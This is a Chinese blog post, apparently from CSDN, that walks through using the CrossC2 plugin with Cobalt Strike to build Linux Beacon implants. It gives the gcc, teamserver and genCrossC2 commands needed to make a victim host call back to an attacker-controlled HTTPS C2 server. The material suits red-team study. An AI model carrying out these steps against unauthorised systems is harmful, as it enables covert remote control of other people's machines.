通过CrossC2上线CS踩坑记(Linux)

最新推荐文章于 2024-04-25 09:41:57 发布
最新推荐文章于 2024-04-25 09:41:57 发布
阅读量4.8k 收藏 7
点赞数
分类专栏: 渗透测试 文章标签: 安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/119490557
版权

概述

传统的cs只支持win机子上线,github开源项目CrossC2(https://github.com/gloxec/CrossC2)支持Linux/Mac/Android/IOS平台Beacon上线,
另外CrossC2当前仅支持>=4.1版本

环境

  • 客户端:cs4.2(mac)
  • 受害机:centos7
  • CrossC2 2.2.4版本(https://github.com/gloxec/CrossC2/releases/tag/v2.2.4)

步骤

  1. 下载https://github.com/gloxec/CrossC2/releases/tag/v2.2.4中的genCrossC2.MacOS,用来在mac客户端下生成cs马,其他客户端就选择其他的。https://github.com/gloxec/CrossC2/tree/v2.2.4/src中下载CrossC2.cna

  2. 打开CrossC2.cna,修改$CC2_PATH为你CrossC2的绝对路径,修改$CC2_BIN为genCrossC2.MacOS(根据1中系统类型下的文件名字:genCrossC2.xxx)
    在这里插入图片描述

  3. 实战中不会不带Profile就直接上线,如果要带profile,需要通过CrossC2的通信协议API,编译生成.so文件。才能生成linux下最终的cs马(https://gloxec.github.io/CrossC2/zh_cn/protocol/)。
    在这里插入图片描述

  4. 此处以作者自带的c2profile.c文件为例(https://github.com/gloxec/CrossC2/blob/v2.2.4/protocol_demo/c2profile.c)。攻击者在生成马之前必须通过该c2profile.c编译生成so,再通过该so生成最终的linux马。
    c2profile.c文件核心作用即告诉beacon按照c2profile.c代码逻辑编写的逻辑构造/解数据包
    gcc c2profile.c -fPIC -shared -o lib_rebind_test.so编译生成so文件。
    这里必须注意,编译so的机器环境最好和受害机完全一致,否则存在最终cs马无法上线的可能性,详见github issue:https://github.com/gloxec/CrossC2/issues/85
    在这里插入图片描述
    在这里插入图片描述

  5. 同样作者提供了https.profile样例文件(https://github.com/gloxec/CrossC2/blob/v2.2.4/protocol_demo/https.profile),用于cs服务端使用,与c2profile.c文件逻辑相对应。
    ./teamserver x.x.x.x 123456 https.profile起cs服务端
    在这里插入图片描述

  6. ./genCrossC2.macos x.x.x.x 443 ./.cobaltstrike.beacon_keys lib_rebind_test.so Linux x64 /xx/Desktop/test生成最终的cs马
    在这里插入图片描述

  7. cs上起listener,由于CrossC2仅支持https的beacon,所以payload只能用Beacon HTTPS,ip和端口与6中x.x.x.x 443相对应
    在这里插入图片描述

  8. 受害机上直接执行刚刚生成的马,即可成功上线
    在这里插入图片描述

  9. 使用者也可自定义c2profile.c文件逻辑和cs的profile,github上相关样例很多,此处不再赘述

ATpiu
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Linux下也能架设CS服务器
08-01
本文用的是cs1.4版本,但是1.5与1.6的架设原理与其基本相同,大家作出相应的修改即可。相信本文可以帮助大家了解到如何在Linux下架设CS服务器。
cs实现上线linux主机与CrossC2的配置
热门推荐
Shanfenglan's blog
10-12 14万+
CATALOG前言配置CS与CrossC2简单的使用 前言 CS主要用来做windows渗透,现通过CrossC2插件即可实现上线linux主机。 CrossC2下载 CrossC2官方手册 其他须知: 目前只支持cs3.14版本,经测试,4.0版本可以上线主机但无法执行其他任何操作。 配置CS与CrossC2 下载完成CrossC2后打开CrossC2.cna文件 修改CC2_PATH路径为当前路径,并检查CC2_BIN文件类型是否与当前系统一致 将服务端的CS根目录下的文件复制到Cross
探秘CrossC2:跨平台控制命令中心的利器
最新发布
gitblog_00063的博客
04-25 337
探秘CrossC2:跨平台控制命令中心的利器 项目地址:https://gitcode.com/gloxec/CrossC2 项目简介 CrossC2 是一个开源项目,旨在提供一种跨平台、安全、可扩展的命令和控制(C2)框架。它的设计目标是帮助开发者构建自定义的隐蔽通信系统,适用于网络安全研究、物联网设备管理等领域。 技术分析 跨平台支持 CrossC2 使用Python作为主要编程语言,这使得它...
CS通过CrossC2插件上线linux主机
qq_50854662的博客
09-07 242
CS通过CrossC2插件上线linux主机
cobaltstrike安装_CobaltStrike使用CrossC2上线linux
weixin_39914863的博客
11-26 1813
这是一篇宠粉向的文章,做公众号这么久了,经常会收到很多人的留言,看到自己的文章能帮助到别人,是一件很开心的事情。最近有朋友提出来了上线的问题,于是水文一篇,聊聊这个话题。CrossC2是什么?面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估,支持自定义模块,及包含一些常用的渗透模块。其开源地址为https:/...
cobaltstrike安装_Cobalt Strike使用Cross C2上线Linux
weixin_39812046的博客
11-30 943
0x01前言Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件,可做一些简单的操作,记录一下使用过程中遇到的一些小问题。Cross c2支持架构说明:0x02 创建监听器Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听Cobalt ...
CrossC2-cs4.1.zip
07-24
【标题】"CrossC2-cs4.1.zip" 是一个与信息安全相关的压缩文件,其中包含的可能是一个针对跨平台指挥与控制(CrossC2)技术的研究或工具集。"cs4.1" 可能表示这是一个版本号,暗示这是CrossC2的第四次重大更新的第1...
CS.rar_linux cs_unix socket
09-14
当我们谈论“CS.rar_linux cs_unix socket”时,这是指一个关于Linux操作系统下使用Unix套接字(socket)进行客户端-服务器(Client-Server)通信的编程实践。Unix套接字是跨进程通信(Inter-Process Communication,...
cs8427.rar_CS8427_V2
09-20
总的来说,CS8427是一个重要的音频处理芯片,它在Linux系统中通过I2C接口进行通信。提供的源代码文件`cs8427.c`和`cs8427.h`是驱动该芯片的关键,它们实现了与硬件交互的逻辑,并提供了用户空间访问CS8427功能的接口...
CrossC2生成CobaltStrike的跨平台有效负载
02-03
"跨平台"一词表明CrossC2支持多种操作系统,包括但不限于Windows、Linux、macOS以及可能的移动平台如Android和iOS。 **描述解析:** 描述中的"CrossC2生成CobaltStrike的跨平台有效负载"是对标题的简单重申,...
linux系统特殊文件--/dev/null(黑洞文件)与/dev/zero(空白文件)
qazplmzyy的博客
10-17 4万+
dev/null 是一个特殊的设备文件,在Unix和类Unix系统中被用作黑洞。它是一个空设备,接收所有写入操作,但不保存任何数据。因此,它被用于丢弃不需要的输出或将输出重定向到无效的位置。
Cobalt Strike 插件CrossC2(小白教程)
m0_63239459的博客
03-10 1800
cobaltstrike插件加载crossc2
p74 应急响应-win&linux 分析后门&勒索病毒&攻击
weixin_43263566的博客
04-12 1295
应急响应-win&linux 分析后门&勒索病毒&攻击
关于CS上线Linux主机(CrossC2
Adminxe的博客
07-11 2531
0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。 简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,记录一下使用过程中遇到的一些问题,并且在使用中操作的正确性。 Cross c2支持架构说明: ..
cs上线linux主机
逍遥小哥的博客
01-19 762
cobaltstike默认只生成windows载荷,不能上线linux主机,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac).由于我们cs客户端是在windows生成,就下载win版的crossC2就行。把此文件.cobaltstrike.beacon_keys 文件放到客户端cs的文件夹里。和我上面的命令一样啊,感觉就是配了个路径的环境变量,执行起了更加方便了。这就是生成成功,会在cs客户端目录生成文件, 我这里生成了两个。然后把我们刚才用第二个方式生成文件丢上去。
解决cs不能生成Linux的问题
weixin_65582330的博客
03-02 639
要下载的是上面圈起来的两个就行了 ,genCrossC2的文件类型主要是看你客户端的主机是什么系统,如果你是linux就下linux,如果是windows就下win,以此类推。接下来看操作,这里我的客户端是windows,所以下载windows的。服务端自动生成 .cobaltstrike.beacon_keys,如果没有重新导入几次,然后把这个文件放到CrossC2插件文件夹下,这个文件很重要,是CS的密钥文件,因为CrossC2插件仅支持 reverse_https 协议。下载插件:CrossC2
渗透测试】Cobalt Strike 插件 CrossC2(v3.0.2) 安装使用
SunnyCat
02-09 1万+
目录一、起因二、安装1)客户端配置2)vps服务端操作3)客户端cs操作三、上线1)二进制木文件上线2)命令行上线 一、起因 cobaltstike默认只生成windows载荷,不能上线linux主机,想上线linux主机需要通过ssh回话的方式,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac) 项目地址:https://github.com/gloxec/CrossC2/ 参考地址:https://gloxec.github.io/CrossC2/zh_cn/ 二、安装 需要准
CobaltStrike 之 Linux上线笔记 (CrossC2插件使用)
box
03-03 1万+
CobaltStrike 默认是不支持Linux上线,有一款插件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款插件的配置和使用。 一、插件配置 项目地址:https://github.com/gloxec/CrossC2 将这两个文件下载下来,创建一个文件夹,并放置文件夹下 修改 CrossC2-GithubBot-2021-11-02.cna 修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 / 修改$CC2_BIN 为pay
Linux V4L2视频驱动移植入门详解
Linux视频驱动移植文档详细探讨了如何将视频驱动适配到V4L2(Video for Linux 2)框架,这是一种广泛用于Linux系统中的视频输入/输出接口标准。V4L2支持五种主要接口,包括视频采集、视频输出、视频叠加、VBI信号...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值